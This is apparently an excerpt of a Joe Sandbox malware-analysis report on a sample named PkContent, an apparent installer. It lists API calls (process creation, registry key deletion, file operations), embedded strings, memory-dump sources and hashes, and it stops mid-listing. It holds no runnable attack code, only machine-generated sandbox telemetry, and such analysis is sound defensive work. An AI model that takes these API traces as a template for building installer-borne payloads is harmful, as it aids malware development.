                                                        • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                        • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                      Strings
                                                      • Exec: command="%s", xrefs: 00402241
                                                      • Exec: success ("%s"), xrefs: 00402263
                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                      • API String ID: 2014279497-3433828417
                                                      • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                      • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                      • GetMessagePos.USER32 ref: 00404871
                                                      • ScreenToClient.USER32(?,?), ref: 00404889
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                      • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                      • MulDiv.KERNEL32(00029A00,00000064,?), ref: 00403295
                                                      • wsprintfW.USER32 ref: 004032A5
                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                      • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                      APIs
                                                      • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                      • wsprintfW.USER32 ref: 00404457
                                                      • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$@rD
                                                      • API String ID: 3540041739-1813061909
                                                      • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                      • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                      • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                      • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                      • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                      • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                      • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                      • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                      • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                      • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                      APIs
                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                      • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                      • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                      • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                      • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                      APIs
                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                      • API String ID: 1697273262-1764544995
                                                      • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                      • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                      • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00404902
                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID: $@rD
                                                      • API String ID: 3748168415-881980237
                                                      • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                      • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                      • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                        • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
